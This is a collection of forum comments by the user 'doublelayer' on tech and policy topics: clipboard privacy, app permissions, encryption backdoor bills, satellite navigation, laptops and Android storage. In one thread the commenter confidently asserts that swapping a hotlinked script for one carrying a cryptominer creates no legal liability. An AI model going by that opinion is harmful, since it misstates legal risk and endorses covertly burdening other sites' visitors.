Posts by doublelayer

Re: Why wouldn't Tim Berners-Lee have 17 years experience designing websites?

That's part of it, and that does earn the interviewee a demerit. But the tweet contains three components if you ask me:

"We interviewed a 28yo designer in 2012 who told us he had 17 years experience designing websites.": Interviewee claimed to start designing sites at the age of 11 in 1995, which is possible but unlikely.

"I said, 'Tim Berners-Lee doesn’t have 17 years experience designing websites.'": This sounds to me as if the interviewer actually thought this was true. As it happens, it was not. If you count HTML websites on WWW, he had 21-22 years experience. If you count his previous work on CERN-specific pages that worked like websites with hypertext, it is even more.

And then the point about the interviewee not knowing who that was.

Re: I know not of these matters...

I think most of your statements are wrong there. We'll start with the first one. You can violate privacy without immediately sending the contents of the clipboard off. As a basic example, if you copied it into an internal buffer and used it to perform on-device metrics, even if you never sent those metrics, it could be violating the privacy of data stored in the clipboard. Sure, it's relatively low-level and users should be careful (that is assuming this app only did this while in the foreground), but don't assume that violating privacy requires phoning home. In this case, I don't think LinkedIn was using this as a sneaky data collection feature because it would be so fragile. I think it's more likely that some coder thought it would be useful and didn't think of alternatives or the downsides.

Now on to the code part. You say that checking the clipboard content "is absolutely required if you want to implement "Paste" into anything other than text views and text fields." Not true, because you still only have to read from the clipboard when a user presses that button. The issue here is checking the content in a loop without any button. Then, you said that "you want to know what's in there so you don't have for example a "Paste" button if there is stuff that you can't paste." I disagree, because I find hiding controls that you sometimes have and sometimes don't confuses the users, but that's a subjective UX thing. You can implement format-specific paste in a number of ways, including cancelling a paste operation without changing the original content if the contents are not compatible. You can warn the user or not as you desire.

"And then there's the fact that in Windows, Linux, MacOS, Android, and iOS up to 13.0, everyone does it. For good reasons."

You are assuming the reasons are good. Frequently, I find that good programs wait for me to paste in the contents of my clipboard rather than snatching potentially incorrect data out, though I will admit I've seen some go the other way.

Unless you really need real-time monitoring of clipboard contents for some reason, you are also making your application do a lot of pointless busy looping. This isn't great for performance or power usage if you do it for long enough.

Re: Another non-event distracting us

It wouldn't need root access to be able to do things you wouldn't like. I checked out its Exodus privacy report which shows information about permissions and trackers found in its Android app. That's quite a lot of permissions. Malware given access to those would be able to do lots of things, including making and inspecting network traffic. As with far too many Android apps, this app also requests permissions that don't seem to make any sense (install new packages, for example). From inside that sandbox, you can still do a lot.

Now, just because this app requests those permissions doesn't necessarily mean that all are granted or that they work. Nor does it mean that there is something malicious using them. I wouldn't be surprised to hear that TikTok does have a mechanism allowing their developers to push arbitrary code and run it. I also wouldn't be surprised to hear that Facebook has a method to push arbitrary code and run it. I already know that Google does have several ways to push arbitrary code and run it. As with any other application, the degree of trust in its developer and usefulness of the features must be taken into account before deciding whether to use it. I wouldn't trust it, but I also have no inclination to use it and there are already hundreds of other companies' apps that I also don't trust.

Re: 5v/12v ring

"Agreed, but wondering what the load would actually look like though"

There are quite a few devices capable of drawing high power outside the kitchen (and I'm assuming you are also counting the laundry room and garage in the rooms needing higher power). There is of course the powerful desktop computer, especially a gaming or high-processing dev machine, probably one of the first to jump to mind for us on this forum. But there are other things, some with even higher draw. Printers, for example, can get pretty spiky. Portable heaters which are designed to quickly warm up the immediate area are also power hungry. Vacuum cleaners vary a lot, but I have not yet seen a USB vacuum capable of rapidly cleaning the floor. Fans may not be very hungry, but they will draw quite a bit of current if you run them at 5V. Televisions, speaker systems, and the like run with relatively little power, but high enough that running them together at low voltage is going to push the current level too high. Even laptops with large screens can charge at around 100W, usually through 20V USB-PD, which at 12V is a potentially undesirable 8.33A.

The problem is that there are potential users of increased power elsewhere in the house, so you will want to provide it. Probably relatively few people want to run an 800W GPU stack, but those who do will be annoyed if you take their mains availability away. Since we can easily step down to voltages at the point of the device, but stepping up is going to mean dangerous current draw, it is probably more efficient to leave sufficient voltage for more power hungry devices. If those voltages are never requested, little is lost.

Re: You're funny

"las t time a friend tried charging his iphone here (last years model) he found that with his genuine lead it refused to charge from the usb chargers that we use for our samsung & honor phones, in the end the only thing we found that would charge it was an old charger for a 1st generation ipad mini."

I really don't know about this. I have had iPhones, and they have charged off anything, up to and including a Raspberry Pi. I know I charged one off this really cheap plug next to me which is, let me check, a ZTE. I don't even know how I got a ZTE USB adapter, but it works fine on everything, so it remains in service.

Re: Fault at both sides

I very much agree. I was expecting to read that a user had realized that, by getting a quote with a different ID, they could trick the backend into purchasing stock at a different price and that a heist by a black hat was on the way. Verify all input from users; they are not to be trusted.

Re: New one on me

Come on. "I can math" has always in my experience been a lighthearted joke in one of two situations: someone expresses surprise at your having done some calculation quickly or when they didn't expect you to do it, or you have made a stupid mistake in mental arithmetic. It's used to juxtapose someone who doesn't know how to phrase that grammatically correctly with someone who is doing mental mathematics. As for "I logicked", I have heard that but very rarely and the grammatical way of saying the same thing: "I used logical thinking to come up with a solution" sounds pretty stupid too.

There are some people who seem to enjoy verbifying nouns, but it's usually sectors like PR or consultants who need new euphemisms or new things they are an expert in that nobody else has heard of so they must be good.

Re: As I read that

"It wiped the car. It just didn't wipe Tom Tom's customer database, which is not in the car."

I get this distinction. When I first read it, I was inclined to agree with it. Having read information in other comments however, I don't think the user is at fault here. It wiped the internal parts of the car. The car was sold with the TomTom device included, meaning that device was in the car at time of purchase. The device interacted with the main car display, meaning that a user could infer, incorrectly in this case, that it was connected to the car's systems and would also be reset on the activation of the wipe. That device didn't get reset or, if it did, didn't update the account it was connected to to inform the account of the reset. And the user didn't have any repeated billing set up on that account. When the charge, wholly unexpected as it was TomTom's error, came through, it presumably indicated in some way that it was linked to that particular Mazda vehicle.

You could see why the original misconception was that Mazda could do something about this. They sold the equipment in the car, their screen controlled the equipment and was used to perform the reset, and the bill mentioned them. Now we know that that wasn't correct, and it wouldn't be fair to them to continue to blame them for much other than failing to warn of this possibility in the reset process. Still, given the limited information available at earlier points in the process, I think the concern was understandable.

Re: Can we get a utilitarian tablet?

So you want a tablet with few inputs, bigger than a tablet, with no battery? An odd use case, I'd say, but you can probably manage it if you're willing to fiddle around. You could, for example, get a Surface, disconnect the camera (from a teardown it looks like that's doable), and run Android X86 on it. Or you could get a tablet meant to run Linux which has killswitches for all those things and do a bit of work to make Android run well on it. And I found some large, desktop-sized all-in-ones with Android on them from several years ago. Maybe one of those product lines still exists. But if you're asking why companies haven't built that device already, it's because it isn't very useful for people. Most users use tablets and touchscreen devices for portable, not desktop, use cases. So they make them smaller and with batteries.

Re: Democrats

I thought that about the surveillance bills passed in the early 2000s. Then I stopped thinking that, which was good because it's painful to be wrong and I would have experienced that pain every year or so when they blindly reauthorized those powers, even as revelation after revelation came through about what those powers were being used for. Why should I believe that any politician, other than perhaps Senator Wyden, understands or cares about privacy and security? I have seen no evidence in favor and quite a bit of it against.

Re: once the encryption is broken...

That's likely not how that would work. First, it requires tech companies, most or all of them, to choose altruism and privacy over profit and friends in government. They're already not willing to do that; why will they when it's even more painful? Most of the big companies don't really care much about encryption. They provide it some of the time, but mostly they don't bother. The primary exception among the giants is Apple, but Apple alone probably can't do much about this, especially as they don't run public online platforms anyway so they're safer than most from the effects.

Of course, if some company does decide to turn off a state for those reasons, that state will almost certainly find a way to go after them. They could, for example, sue them for violations if they can get any connection from that state to the encrypted system run outside it. States have power to arrest employees or get assets the company might have there, so if they want to force a company to comply with the law in one specific way, they have some tools they can use to try to make that happen.

From the article, which presumably you read before getting here:

"Initial drafts of the law also contained two proposals that raised serious concerns from a broad range of groups and organizations. Firstly, the creation of a new 19-person committee that would be led by the Attorney General and dominated by law enforcement which would create content rules that tech companies would have to follow to retain legal protections. Secondly, and the suggestion that has security folks up in arms, is that those rules could require tech companies to provide Feds-only access to encrypted communications."

Summarized from later in the same article:

That panel: Still in the law. Still law enforcement.

That panel empowered to require backdoors: No.

Fifty state panels empowered: Yes.

Fifty state panels restricted from requiring backdoors: No.

Some state governments expressed interest in backdoors: Yes.

So some states could make encryption illegal: Yes.

So companies would have a patchwork approach: Yes.

Which would be really tricky and open them up to lawsuits: Yes.

Which companies like to avoid: Yes.

Easy solution to that: Don't offer encryption inside U.S.

Re: We're all fucked....

"Once it affects those senators, then they'll realise the mistake they made."

I admire your optimism. I unfortunately cannot see them ever understanding what this does, even if they are directly targeted by it. Even if the person who breaks in puts a message box on their screen saying "I could do this because of the act you passed", they'll probably go on thinking that it made total sense. Now, in order to find the person who broke into my computer system, I am proposing we pass the Encryption Violations and Intelligent Law Act, which will allow law enforcement to access information during investigations without a warrant as long as a copy of that data, encrypted or not, has ever existed outside the house of the subject, on the basis that current law only requires a warrant to search the houses of subjects so data isn't included.

Re: Sometimes you just have to be there

I entirely agree. I think this applies to most of life, really. I've certainly noticed that some types of activities I did at the office are not working as efficiently now that I am at home, and my job is one of the most easily virtualized ones. Still, I know that it is not safe for me to return to the office, and if the U.S.'s trend continues, it may not be safe for students to return to universities in a month or two. Given this safety concern, there are only a few ways to deal with it.

You could just cancel classes and postpone them for a time when optimal learning conditions are available again. This would harm plenty of students who will have delayed entry into the job market and may not have the economic ability to do nothing for a semester. You could bring all the students to the campus with the ability to send them back home if something happens, but in addition to increasing the likelihood of something happening, you have also created a bunch of chaos if you do exercise the option of sending the students away. You could try a hybrid model where some students show up and some don't, which would probably be bad because those who do show up get all the benefits you listed in your comment while those who go virtual aren't the primary focus of the university's planning (as well as all the concerns about bringing everyone back just scaled down a bit).

While you raise valid points, nobody is doing this because they think it's better. They're doing it because the situation is dangerous.

Re: It Could Be Made to Work ???

Well, that has several downsides. Basically, you're hoping to compare a lot of latencies between the satellites, requiring the device at the other end be informed of relatively large sets of data. That would make the system more delicate and require more data from the satellites. It would also make the system a lot more dependent on fixed ground locations, which isn't necessarily the most desirable setup. While those satellites are capable of broadband speeds, doing that would usually require larger receiving dishes and more power output. For things like ships and planes, you probably wouldn't find it that hard. For portable units used by field troops, that approach might be inadvisable. Still, if they intend to use the constellation for this purpose, they may find that my concerns are not that troubling. Still, if I were them and wanted to do the navigation with these satellites, I'd start by considering just putting the clocks in the ones that haven't yet been launched. They're planning to send thousands up; it's fine if 80 don't have clocks.

Re: It Could Be Made to Work ???

Phone chipsets rarely support additional services that weren't around when the chip was designed. No matter how a new navigation system is implemented, whether almost identical to GPS or entirely different, a new chip will be needed to receive from it. The only exception would be a system which augments an existing one, similar to how QZSS overlays upon GPS for Japan. As for the clocks, that would be a problem. While they could put the clocks in the new satellites and reprogram them, they could have also put clocks in their own satellites without buying this company. While a navigation system isn't impossible, it would seem to be a strange step to take if that was the primary goal. Given their discussion of broadband, perhaps they have other goals in mind. Whether those goals make sense or are in any way useful is another question.

Re: Liability

Yes, you can switch an image in such a way that you are in the wrong. It's not because you switched the image. It's because the image you switched to is illegal, meaning you are guilty of possessing an illegal image and of trying to distribute it. You can claim maliciousness on any switch, but the fact remains that it's not their image to retrieve. It does not matter what it was or what it switched to; they have no legal claim.

For example, let's consider part of your comment:

"unless you switched the file with malicious intent, meaning to cause harm, inconvenience, punishment."

The most open of those words is inconvenience. The problem is that, although anything I change is inconvenient, they don't have any right to convenience on that basis. They are using my bandwidth without permission. It is similar to if they ran their corporate network off my WiFi from next door without permission. If I found out and changed the password, they would be inconvenienced. However, they would not have the right to recompense for that because the inconvenience they received was a direct result of their doing something they do not have a right to do. I did not guarantee that I would keep my WiFi up, nor did I guarantee that my server would stay up, nor did I guarantee that I wouldn't change files.

The same argument applies to harm. If they connected a device to my WiFi that would cause harm if it lost network connection, and when I changed the password it did cause harm, that is not my responsibility. They exposed the victim to harm by making it rely on something they didn't have a right to use. That is, at the very least, negligence. I don't think most courts would stop there either.

Re: Liability

"Lets say you were hosting a copy of (say) jQuery. Then, you notice that Barclays have hotlinked it into their own site. If you now come along and stick a crypto-miner into that file, you're opening yourself up for a world of hurt."

If I want to make a script on my page with a cryptominer, I am allowed to do so. If I call that file JQuery.js, I am allowed to do that. If I edit JQuery, I am allowed to do that (MIT license). So the only way they would have a legal claim is if I agreed to host it for them. Otherwise, I have never made any guarantee that the file would remain what they saw at one point. I can argue that I did not know they were linking to the file, and they would have no proof that I knew that. I can argue that they were violating my terms of service by linking to the file, and if I did edit my ToS accordingly I would have a better case than they would. I don't need to claim either of those things in order to have the right.

The issue of a powerful place using legal might to harm people they don't like, even when they have no legal basis to their attacks, is accurate. However, it's also possible for them to do this for anything else. If they hotlinked to a file and I changed it to indicate they used without permission, they could get angry. If I blocked their request, they could similarly get angry. If they felt the need, they could have their lawyers sue me for breaking their service. However, if I blocked, edited to print a string, or edited to introduce a miner, I have the same rights to do what I have done and they have no basis to win the case.

Re: Liability

If they have hotlinked to your site because you are providing them a service, then there is a terms of service document describing who is responsible and potential penalties in various situations. Under GDPR, your site would be a data processor and both you and the original site would need to ensure legal handling of the data provided to you. If you violated that, data protection authorities can go after you, even if it was through another site that the data came to you.

If they link to you without permission, then you are not responsible. Well, that depends--if you log information you know to be personal information when you know you have no right to it, data protection can still go after you. But for most other things, you don't have any responsibility. If you want to host scripts that nobody else would want on your site, you are allowed to do so. For example, cryptomining scripts are not illegal, so you can put them up if you wish. If someone decides to link to a file and you switch it to a different file, that's their problem. Any liability would be on them because their site, not yours, was the one deciding what the user gets, and it was their choice to include a script their users don't like.

Well, many businesses want someone's head because it's an easy way to make it look like they've done something: "The employee responsible was fired [and therefore the person who should have detected and prevented won't be]". But there's various times when it's the right response. I don't know how or why this particular error happened. However, if it was somehow done intentionally, it's a very obviously bad thing to do. Someone who decides to use a compromisable third party without any guarantee of security or functionality might not be the best coder out there.

Yes, there are lots of things that can fall into that bucket, but this is worse than most of them. For example, although pulling code directly from NPM is similarly dangerous, people at least expect that it happens and do some types of automatic security checks on new releases. Nobody's going to do that for the Internet Archive. Also, most places from which external scripts are retrieved at least expect that to happen and have made statements about keeping their server up. I don't think the Archive has ever indicated they are willing to be used as a CDN and they can delete files or edit them at any time without notice.

So, if you have a sufficiently worrying practice being intentionally used, you have to wonder whether you will catch them if they do something like that again. That isn't necessarily a reason to immediately fire someone, but if you have alternatives, and the current job market means you probably do, it's a thing worth considering. A good company won't fire people for honest accidents, but negligence or intentionally doing something stupid are potentially worth it.

Re: Pre-orders for the Librem 14 opened today priced at $1,199.

I checked out their specs page. Base RAM is 8GB. Increasing that to 16 GB costs $79 and to 32 GB costs $219. Base storage is a 250 GB SATA M.2 SSD. They have various larger and faster options.

For those outside the U.S., there are some limitations there. You'll notice I quoted all prices in dollars, because they don't seem to have prices in any other currency. They note that, while they ship, taxes in other countries are the buyer's responsibility so I can't tell you U.K. prices with VAT included. They have power adapters for U.S., U.K., and EU sockets. Not Australia, though it is a USB-PD one so that doesn't have to be a problem. Also, they only seem to have English U.S. keyboard layouts right now. If you can touch type your language on that layout, you're good. If you have an attachment to the U.K. layout, maybe they'll fix that sometime.

Re: Why Intel?

You can get a thing like this with an ARM processor at the core. I think there are a few like that, but the one I know about is the Pinebook Pro. It is very open, has hardware designs, firmware source, hardware killswitches. The only downsides are that, using conventionally available ARM SOCs, it is a little limited performance-wise. It maxes out at 4 GB memory, and has six relatively slow CPU cores. If you can handle the reduced performance in a laptop and want a lot of privacy and security, that's probably a good option. Otherwise, we will have to wait for more easily obtained fast SOCs or stick to X64.

Re: Severely endangering national security

"the Chinese government (indeed, its people) may prize stability more than "flourishing" or 'progress.'"

Rubbish. The Chinese government prefers that because stability means the previous status quo, I.E. they have all the power, stays in place. The people don't get to decide because 1) the government has done everything it can to mislead them about the benefits of their rule and the dangers of its removal, 2) the government has done everything it can to indicate that, should you have opinions, it is wise not to tell anyone lest they be forced to give you some vocational training, 3) the government has also indicated that, if you don't have opinions or even if you do, and someone asks you for your opinion, you should state one fully supporting the government, and 4) the government has demonstrated the capability and willingness to back up items 1-3 with violence.

I am tired of the arguments that a dictatorship is suddenly acceptable because it is desired by its victims. It's simply not true. Cultures may have different ideas about what they view as logical, but similar cultures in places like Taiwan and yes, Hong Kong, prove that there is not some Chinese acceptance of authoritarianism. No, you cannot base it off the writings of east Asian philosophers who preached the same, because I can find Thomas Hobbes and many like him and throw him back at you. Democracy as it is currently practiced is a relatively new concept, and it is not restricted to some subset of the world's cultures.

Everyone is capable of deciding how they want their government constructed. Nearly universally, when people are given that choice, even without experience with all options, they have chosen democracy or something they thought would be democracy. The democracy practiced in Japan and South Korea is differently structured than that in the U.K. and U.S., just as it is different from that practiced in Chile, Sweden, or various other clearly democratic countries.

Re: What's wrong with standard unix user-group-world and access control lists?

Android has lots of problems, and it's not because of their SD card format. If they wanted to, they could sandbox the SD card easily without doing anything to the format. It's already set up to have directories where apps write by default. They just block access to those directories based on the app, allowing the user to override that. Problem solved. Except that's not the problem. Android's problems run a lot deeper than that, and the choice of format and decision not to sandbox the SD card too is somewhere between inconsequential and slightly positive.